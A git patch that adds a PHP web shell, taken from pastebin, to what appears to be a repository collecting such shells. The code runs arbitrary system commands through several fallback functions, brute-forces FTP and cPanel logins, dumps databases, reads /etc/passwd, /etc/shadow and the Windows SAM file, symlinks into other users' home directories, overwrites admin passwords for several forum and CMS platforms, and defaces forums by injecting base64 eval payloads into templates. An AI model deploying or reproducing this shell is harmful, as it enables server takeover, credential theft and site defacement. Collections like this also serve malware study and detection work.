From d00091ccdf7a68550a27497128239920b979a8f7 Mon Sep 17 00:00:00 2001 From: tennc Date: Thu, 14 Sep 2017 15:22:33 +0800 Subject: [PATCH] Create v4xGus6X.php from : http://pastebin.com/raw/v4xGus6X https://isc.sans.edu/diary/22826 --- php/twitter/v4xGus6X.php | 6240 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 6240 insertions(+) create mode 100644 php/twitter/v4xGus6X.php diff --git a/php/twitter/v4xGus6X.php b/php/twitter/v4xGus6X.php new file mode 100644 index 0000000..5f9c3b4 --- /dev/null +++ b/php/twitter/v4xGus6X.php @@ -0,0 +1,6240 @@ + $k) { + $row[$j] = "'".mysql_escape_string($k)."'"; + } + write("INSERT INTO $i VALUES(".implode(",", $row).");"); + } + } + } + + fclose ($fp); + + header("Content-Disposition: attachment; filename=" . $file); + header("Content-Type: application/download"); + header("Content-Length: " . filesize($file)); + flush(); + + $fp = fopen($file, "r"); + while (!feof($fp)) + { + echo fread($fp, 65536); + flush(); + } + fclose($fp); + } +} +function shellstyle() +{ + echo ""; +} +if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass)) +{ + $self=$_SERVER["PHP_SELF"]; + $os = "N/D"; + $bdmessage = null; + $dir = getcwd(); + + if(stristr(php_uname(),"Windows")) + { + $SEPARATOR = '\\'; + $os = "Windows"; + $directorysperator="\\"; + } + else if(stristr(php_uname(),"Linux")) + { + $os = "Linux"; + $directorysperator='/'; + } + function Trail($d,$directsperator) + { + $d=explode($directsperator,$d); + array_pop($d); + array_pop($d); + $str=implode($d,$directsperator); + return $str; + } + + function ftp_check($host,$user,$pass,$timeout) + { + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "ftp://$host"); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print "
+ Error : Connection Timeout. + Please Check The Target Hostname .
";exit; + } + else if ( curl_errno($ch) == 0 ) + { + print "
[~] + Cracking Success With Username "$user\" + and Password \"$pass\"


"; + } + curl_close($ch); + } + + function cpanel_check($host,$user,$pass,$timeout) + { + global $cpanel_port; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { print "
Error : Connection Timeout. + Please Check The Target Hostname.
";exit;} + else if ( curl_errno($ch) == 0 ){ + print "[~] + + Cracking Success With Username "$user\" + and Password \"$pass\"

"; + } + curl_close($ch); + } + + // Database functions + function listdatabase() + { + $self=$_SERVER["PHP_SELF"]; + ?> +
+
+ + + + + +
+
+
+ \n"; + + $pDB = mysql_list_dbs( $mysqlHandle ); + $num = mysql_num_rows( $pDB ); + for( $i = 0; $i < $num; $i++ ) + { + $dbname = mysql_dbname( $pDB, $i ); + mysql_select_db($dbname,$mysqlHandle); + $result = mysql_query("SHOW TABLES"); + $num_of_tables = mysql_num_rows($result); + echo "\n"; + echo "$dbname ($num_of_tables)\n"; + echo "Tables\n"; + echo "Drop\n"; + echo "Dump\n"; + echo "\n"; + } + echo "\n"; + mysql_close($mysqlHandle); + } + + function listtable() + { + $self=$_SERVER["PHP_SELF"]; + $dbserver = $_COOKIE["dbserver"]; + $dbuser = $_COOKIE["dbuser"]; + $dbpass = $_COOKIE["dbpass"]; + $dbname = $_GET['dbname']; + echo "
[ $dbname ] - > Database List   [ Log Out ]
"; + ?> +

+
+ + + + + + +
+ +
+ + + + + + + + +
+
+ + Error : $msg

\n"; + return; + } + $num = mysql_num_rows( $pTable ); + + echo "\n"; + + for( $i = 0; $i < $num; $i++ ) + { + $tablename = mysql_tablename( $pTable, $i ); + $result = mysql_query("select * from $tablename"); + $num_rows = mysql_num_rows($result); + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + } + + echo "
\n"; + echo "$tablename ($num_rows)\n"; + echo "\n"; + echo "Schema\n"; + echo "\n"; + echo "Data\n"; + echo "\n"; + echo "Empty\n"; + echo "\n"; + echo "Drop\n"; + echo "
"; + mysql_close($mysqlHandle); + echo "

[ $dbname ] - > Database List   [ Log Out ]
"; + } + + + function paramexe($n, $v) + { + $v = trim($v); + if($v) + { + echo '' . $n . ': '; + if(strpos($v, "\n") === false) + echo '' . $v . '
'; + else + echo '
' . $v . '
'; + } + } + + + + function rrmdir($dir) + { + if (is_dir($dir)) // ensures that we actually have a directory + { + $objects = scandir($dir); // gets all files and folders inside + foreach ($objects as $object) + { + if ($object != '.' && $object != '..') + { + if (is_dir($dir . '/' . $object)) + { + // if we find a directory, do a recursive call + rrmdir($dir . '/' . $object); + } + else + { + // if we find a file, simply delete it + unlink($dir . '/' . $object); + } + } + } + // the original directory is now empty, so delete it + rmdir($dir); + } + } + + function which($pr) + { + $path = execmd("which $pr"); + if(!empty($path)) + return trim($path); + else + return trim($pr); + } + + function magicboom($text) + { + if (!get_magic_quotes_gpc()) + return $text; + return stripslashes($text); + } + +function execmd($cmd,$d_functions="None") +{ + if($d_functions=="None") + { + $ret=passthru($cmd); + return $ret; + } + $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); + $d_functions=str_replace(" ","",$d_functions); + $dis_funcs=explode(",",$d_functions); + foreach($funcs as $safe) + { + if(!in_array($safe,$dis_funcs)) + { + if($safe=="exec") + { + $ret=@exec($cmd); + $ret=join("\n",$ret); + return $ret; + } + elseif($safe=="system") + { + $ret=@system($cmd); + return $ret; + } + elseif($safe=="passthru") + { + $ret=@passthru($cmd); + return $ret; + } + elseif($safe=="shell_exec") + { + $ret=@shell_exec($cmd); + return $ret; + } + elseif($safe=="popen") + { + $ret=@popen("$cmd",'r'); + if(is_resource($ret)) + { + while(@!feof($ret)) + $read.=@fgets($ret); + @pclose($ret); + return $read; + } + return -1; + } + elseif($safe="proc_open") + { + $cmdpipe=array( + 0=>array('pipe','r'), + 1=>array('pipe','w') + ); + $resource=@proc_open($cmd,$cmdpipe,$pipes); + if(@is_resource($resource)) + { + while(@!feof($pipes[1])) + $ret.=@fgets($pipes[1]); + @fclose($pipes[1]); + @proc_close($resource); + return $ret; + } + return -1; + } + } + } + return -1; +} + + function getDisabledFunctions() + { + if(!ini_get('disable_functions')) + { + return "None"; + } + else + { + return @ini_get('disable_functions'); + } + } + + function getFilePermissions($file) + { + $perms = fileperms($file); + + if (($perms & 0xC000) == 0xC000) { + // Socket + $info = 's'; + } elseif (($perms & 0xA000) == 0xA000) { + // Symbolic Link + $info = 'l'; + } elseif (($perms & 0x8000) == 0x8000) { + // Regular + $info = '-'; + } elseif (($perms & 0x6000) == 0x6000) { + // Block special + $info = 'b'; + } elseif (($perms & 0x4000) == 0x4000) { + // Directory + $info = 'd'; + } elseif (($perms & 0x2000) == 0x2000) { + // Character special + $info = 'c'; + } elseif (($perms & 0x1000) == 0x1000) { + // FIFO pipe + $info = 'p'; + } else { + // Unknown + $info = 'u'; + } + + // Owner + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); + + // Group + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); + + // World + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); + + return $info; +} + function filepermscolor($filename) + { + if(!@is_readable($filename)) + return "".getFilePermissions($filename).""; + else if(!@is_writable($filename)) + return "".getFilePermissions($filename).""; + else + return "".getFilePermissions($filename).""; + } + + function yourip() + { + echo $_SERVER["REMOTE_ADDR"]; + } + function phpver() + { + $pv=@phpversion(); + echo $pv; + } + function magic_quote() + { + echo get_magic_quotes_gpc()?"ON":"OFF"; + } + function serverip() + { + echo getenv('SERVER_ADDR'); + } + function serverport() + { + echo $_SERVER['SERVER_PORT']; + } + function safe() + { + global $sm; + return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF"; + } + function serveradmin() + { + echo $_SERVER['SERVER_ADMIN']; + } + function systeminfo() + { + echo php_uname(); + } + function curlinfo() + { + echo function_exists('curl_version')?("Enabled"):("Disabled"); + } + function oracleinfo() + { + echo function_exists('ocilogon')?("Enabled"):("Disabled"); + } + function mysqlinfo() + { + echo function_exists('mysql_connect')?("Enabled"):("Disabled"); + } + function mssqlinfo() + { + echo function_exists('mssql_connect')?("Enabled"):("Disabled"); + } + function postgresqlinfo() + { + echo function_exists('pg_connect')?("Enabled"):("Disabled"); + } + function softwareinfo() + { + echo getenv("SERVER_SOFTWARE"); + } + function download() + { + $frd=$_GET['download']; + $prd=explode("/",$frd); + for($i=0;$i $mod; $i++) + { + $size /= $mod; + } + return round($size, 2) . ' ' . $units[$i]; + } + + function showDrives() + { + global $self; + foreach(range('A','Z') as $drive) + { + if(is_dir($drive.':\\')) + { + $myd = $drive.":\\"; + ?> + + + + ' . $n . ': '; + if(strpos($v, "\n") === false) + echo '' . $v . '
'; + else + echo '
' . $v . '
'; + } + } + + myparam('Server software', @getenv('SERVER_SOFTWARE')); + if(function_exists('apache_get_modules')) + myparam('Loaded Apache modules', implode(', ', apache_get_modules())); + myparam('Open base dir', @ini_get('open_basedir')); + myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + myparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + myparam('Supported databases', implode(', ', $temp)); + echo '
'; + + if($GLOBALS['os'] == 'Linux') { + myparam('Distro : ', myexe("cat /etc/*-release")); + myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); + myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); + myparam('OS version', @file_get_contents('/proc/version')); + myparam('Distr name', @file_get_contents('/etc/issue.net')); + myparam('Where is Perl?', myexe('whereis perl')); + myparam('Where is Python?', myexe('whereis python')); + myparam('Where is gcc?', myexe('whereis gcc')); + myparam('Where is apache?', myexe('whereis apache')); + myparam('CPU?', myexe('cat /proc/cpuinfo')); + myparam('RAM', myexe('free -m')); + myparam('Mount options', myexe('cat /etc/fstab')); + myparam('User Limits', myexe('ulimit -a')); + + + if(!$GLOBALS['safe_mode']) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + echo '
'; + $temp=array(); + foreach ($userful as $item) + if(thiscmd($item)) + $temp[] = $item; + myparam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(thiscmd($item)) + $temp[] = $item; + myparam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(thiscmd($item)) + $temp[] = $item; + myparam('Downloaders', implode(', ',$temp)); + echo '
'; + myparam('HDD space', myexe('df -h')); + myparam('Hosts', @file_get_contents('/etc/hosts')); + + } + } else { + $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam"); + $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts"); + $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks"); + $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam"); + echo "Password File : Download password file
"; + echo "Config Files : [ Hosts ]  [ Local Network Map ]  [ lmhosts ]
"; + $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; + echo "Open Base Dir : " . $base . "
"; + myparam('OS Version',myexe('ver')); + myparam('Account Settings',myexe('net accounts')); + myparam('User Accounts',myexe('net user')); + } + echo ''; + } + + + + function myexe($in) + { + $out = ''; + if (function_exists('exec')) { + @exec($in,$out); + $out = @join("\n",$out); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $out = ""; + while(!@feof($f)) + $out .= fread($f,1024); + pclose($f); + } + return $out; +} + + function exec_all($command) + { + + $output = ''; + if(function_exists('exec')) + { + exec($command,$output); + $output = join("\n",$output); + } + + else if(function_exists('shell_exec')) + { + $output = shell_exec($command); + } + + else if(function_exists('popen')) + { + $handle = popen($command , "r"); // Open the command pipe for reading + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($handle)) + { + $output .= fread($handle, 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($handle)) + { + $output .= fgets($handle,512); + } + + + + } + } + pclose($handle); + } + + + else if(function_exists('system')) + { + ob_start(); //start output buffering + system($command); + $output = ob_get_contents(); // Get the ouput + ob_end_clean(); // Stop output buffering + } + + else if(function_exists('passthru')) + { + ob_start(); //start output buffering + passthru($command); + $output = ob_get_contents(); // Get the ouput + ob_end_clean(); // Stop output buffering + } + + else if(function_exists('proc_open')) + { + $descriptorspec = array( + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + ); + $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes' + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $output .= fread($pipes[1], 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $output .= fgets($pipes[1],512); + } + } + } + pclose($handle); + } + + return(htmlspecialchars($output)); + +} + +$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; +$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; + +function getOGid($value) +{ + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + $owner = $uid . "/". $gid; + return $owner; + } else { + $name=@posix_getpwuid(@fileowner($value)); + $group=@posix_getgrgid(@filegroup($value)); + $owner = $name['name']. " / ". $group['name']; + return $owner; + } +} + +function mainfun($dir) +{ + global $ind, $directorysperator,$os; + + $mydir = basename(dirname(__FILE__)); + $pdir = str_replace($mydir,"",$dir); + $pdir = str_replace("/","",$dir); + + $files = array(); + $dirs = array(); + + $odir=opendir($dir); + while($file = readdir($odir)) + { + if(is_dir($dir.'/'.$file)) + { + $dirs[]=$file; + } + else + { + $files[]=$file; + } + } + $countfiles = count($dirs) + count($files); + $dircount = count($dirs); + $dircount = $dircount-2; + $myfiles = array_merge($dirs,$files); + $i = 0; + if(is_dir($dir)) + { + if(scandir($dir) === false) + echo "
Directory isn't readable
"; + else + { +?>
+ + + + + + + + Owner / Group"; } ?> + + + + + + + + + "; + echo getOGid($dir).""; + } + ?> + + + + + + "; + echo getOGid($val).""; + + } ?> + + + + + + + + "; + echo getOGid($val).""; + } ?> + + + + + + + + + + + + + + "; + echo getOGid($val).""; + } ?> + + + + + +

+ +


  + + +
"; + }} + else + { + echo "

".$_GET['dir']." is NOT a Valid Directory!

"; + } + +} +if(isset($_REQUEST["script"])) +{ + $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL); + ?> +
Listing folder ()
NameSizePermissionsModification DateRenameDownloadAction
[ . ]CURDIR
[ .. ]UPDIR
[ ]DIRRename
". $val . ""; } else { echo $val; } ?> ( Deface IT )"; } } ?>RenameDownload +
+ +
| Do It Manually || Do It Automatically |
+ +
+
+
+ +
+
+ 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + syml($matches,$matches); + } + fclose($file); + unlink("test.txt"); + echo "
[ Done ]
"; + echo "
| Go Here |
"; + + } + else + { + $d0mains = @file("/etc/named.conf"); + if($d0mains) + { + mkdir("dhanushST"); + chdir("dhanushST"); + + foreach($d0mains as $d0main) + { + if(eregi("zone",$d0main)) + { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + + if(strlen(trim($domains[1][0])) > 2) + { + $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); + + syml($user['name'],$domains[1][0]); + } + } + } + echo "
[ Done ]
"; + echo "
| Go Here |
"; + } + else + { + mkdir("dhanushSPT"); + chdir("dhanushSPT"); + $temp = ""; + $val1 = 0; + $val2 = 1000; + for(;$val1 <= $val2;$val1++) + { + $uid = @posix_getpwuid($val1); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + $temp = trim($temp); + + $file5 = fopen("test.txt","w"); + fputs($file5,$temp); + fclose($file5); + + + $file = fopen("test.txt", "r") or exit("Unable to open file!"); + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + syml($matches,$matches); + } + fclose($file); + echo ""; + unlink("test.txt"); + echo "
[ Done ]
"; + echo "
| Go Here |
"; + } + } + } + else + echo "
Cannot Complete the task!!!!
"; + +} +else if(isset($_GET["symlinkfile"])) +{ + if(!isset($_GET['file'])) + { + ?> +
+
+ + +
+

+ check symlink symlink'.$num.' file'; + } + else + echo '
Cannot Create Symlink
'; +} +else if(isset($_REQUEST['404new'])) +{ + ?> +
+

+
+
+
+ Done setting 404 Page !!!!"; + } + else + echo "
Cannot Set 404 Page
"; + } + else if(strlen($ind) != 0) + { + if($myfile = fopen(".htaccess", "a")) + { + fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r"); + + if($myfilee = fopen("404.html", "w+")) + { + fwrite($myfilee, base64_decode($ind)); + + fclose($myfilee); + echo "
Done setting 404 Page !!!!
"; + } + fclose($myfile); + } + else + { + echo "
Cannot Set 404 Page
"; + } + } + else + echo "
Nothing Specified in the shell
"; +} +else if(isset($_GET["domains"])) +{ + ?>
S. No.DomainsUsersSymlinkInformation"; + + $dcount = 1; + foreach($d0mains as $d0main) + { + if(eregi("zone",$d0main)) + { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + + if(strlen(trim($domains[1][0])) > 2) + { + $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); + + echo "" . $dcount . "".$domains[1][0]."".$user['name']."Symlinkinfo"; flush(); + $dcount++; + } + } + + } + echo ""; + } + else + { + if(stristr(php_uname(),"Linux")) + { + ?> +
+
+ + + + + + + + + + + + + + +
Get User Name
Enter Website Name :
+
+
+ S. No.UsersSymlink"; + + $dcount = 1; + $file = fopen("/etc/passwd", "r"); + //Output a line of the file until the end is reached + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + echo "" . $dcount . "" . $matches . ""; + echo "Symlink"; + $dcount++; + } + fclose($file); + + echo ""; + } + else + { + @mkdir("dhanush",0777); + @chdir("dhanush"); + execmd("ln -s / root"); + $file3 = 'Options all + DirectoryIndex Sux.html + AddType text/plain .php + AddHandler server-parsed .php + AddType text/plain .html + AddHandler txt .html + Require None + Satisfy Any + '; + $fp3 = fopen('.htaccess','w'); + $fw3 = fwrite($fp3,$file3); + @fclose($fp3); + + echo ""; + + $temp = ""; + $val1 = 0; + $val2 = 1000; + for(;$val1 <= $val2;$val1++) + { + $uid = @posix_getpwuid($val1); + if ($uid) + $temp .= join(':',$uid)."\n"; + } + echo '
'; + $temp = trim($temp); + + $file5 = fopen("test.txt","w"); + fputs($file5,$temp); + fclose($file5); + + $dcount = 1; + $file = fopen("test.txt", "r"); + while(!feof($file)) + { + $s = fgets($file); + $matches = array(); + $t = preg_match('/\/(.*?)\:\//s', $s, $matches); + $matches = str_replace("home/","",$matches[1]); + if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") + continue; + echo ""; + echo ""; + $dcount++; + } + fclose($file); + echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
"; + unlink("test.txt"); + } + } + else + echo "
Cannot create Symlink
"; + } +} +else if(isset($_GET['host']) && isset($_GET['protocol'])) +{ + echo "Open Ports: "; + $host = $_GET['host']; + $proto = $_GET['protocol']; + $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + for($current = 0; $current <= 23; $current++) + { + $currents = $myports[$current]; + $service = getservbyport($currents, $proto); + // Try to connect to port + $result = fsockopen($host, $currents, $errno, $errstr, 1); + // Show results + if($result) + echo "$currents, "; + } +} +else if(isset($_REQUEST['forumpass'])) +{ + $localhost = $_GET['f1']; + $database = $_GET['f2']; + $username = $_GET['f3']; + $password = $_GET['f4']; + $prefix = $_GET['prefix']; + $newpass = $_GET['newpass']; + $uid = $_GET['uid']; + + if($_GET['forums'] == "vb") + { + $newpass = $_GET['newipbpass']; + $uid = $_GET['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + $salt = "eghjghrtd"; + $newpassword = md5(md5($newpass) . $salt); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); + else + $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "mybb") + { + $newpass = $_GET['newipbpass']; + $uid = $_GET['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + $salt = "jeghj"; + $newpassword = md5(md5($salt).md5($newpass)); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); + else + $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "smf") + { + $newpass = $_GET['newipbpass']; + $uid = $_GET['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + if($prefix == "" || $prefix == null) + { + $result = mysql_query("select member_name from smf_members where id_member = $uid"); + $row = mysql_fetch_array($result); + $membername = $row['member_name']; + $newpassword = sha1(strtolower($membername).$newpass); + $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'"); + } + else + + { + $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid"); + $row = mysql_fetch_array($result); + $membername = $row['member_name']; + $newpassword = sha1(strtolower($membername).$newpass); + $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'"); + } + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "phpbb") + { + $newpass = $_POST['newipbpass']; + $uid = $_POST['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + $newpassword = md5($newpass); + if(empty($prefix) || $prefix == null) + $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'"); + else + $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "ipb") + { + $newpass = $_POST['newipbpass']; + $uid = $_POST['ipbuid']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + $salt = "eghj"; + $newpassword = md5(md5($salt).md5($newpass)); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); + else + $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "wp") + { + $uname = $_GET['uname']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + $newpassword = md5($newpass); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); + else + $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } + else if($_GET['forums'] == "joomla") + { + $newjoomlapass = $_GET['newjoomlapass']; + $joomlauname = $_GET['username']; + $con = mysql_connect($localhost,$username,$password); + $db = mysql_select_db($database,$con); + + $newpassword = md5($newjoomlapass); + if($prefix == "" || $prefix == null) + $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'"); + else + $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'"); + if($sql) + { + mysql_close($con); + echo "Password Changed Successfully"; + } + else + echo "Cannot Change Password"; + } +} +else if(isset($_POST['forumdeface'])) +{ + $localhost = $_POST['f1']; + $database = $_POST['f2']; + $username = $_POST['f3']; + $password = $_POST['f4']; + $index = $_POST['index']; + $prefix = $_POST['tableprefix']; + + if($_POST['forumdeface'] == "vb") + { + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + $index=str_replace('"','\\"',$index); + $attack = "{\${eval(base64_decode(\'"; + $attack .= base64_encode("echo \"$index\";"); + $attack .= "\'))}}{\${exit()}}"; + if($prefix == "" || $prefix == null) + $query = "UPDATE template SET template = '$attack'"; + else + $query = "UPDATE ".$prefix."template SET template = '$attack'"; + $result =@ mysql_query($query,$con); + if($result) + echo "
Vbulletin Forum Defaced Successfully
"; + else + echo "
Cannot Deface Vbulletin Forum
"; + } + else if($_POST['forumdeface'] == "mybb") + { + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + $attack = "{\${eval(base64_decode(\'"; + $attack .= base64_encode("echo \"$index\";"); + $attack .= "\'))}}{\${exit()}}"; + $attack = str_replace('"',"\\'",$attack); + + if($prefix == "" || $prefix == null) + $query = "UPDATE mybb_templates SET template = '$attack'"; + else + $query = "UPDATE ".$prefix."templates SET template = '$attack'"; + $result =@ mysql_query($query,$con); + if($result) + echo "
Mybb Forum Defaced Successfully
"; + else + echo "
Cannot Deface Mybb Forum
"; + } + else if($_POST['forumdeface'] == "smf") + { + $head = $_POST['head']; + $catid = $_POST['f5']; + + $con =@ mysql_connect($localhost,$username,$password); + $db =@ mysql_select_db($database,$con); + if($prefix == "" || $prefix == null) + $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'"; + else + $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'"; + $result =@ mysql_query($query,$con); + if($result) + echo "
SMF Forum Index Changed Successfully
"; + else + echo "
Cannot Deface SMF Forum
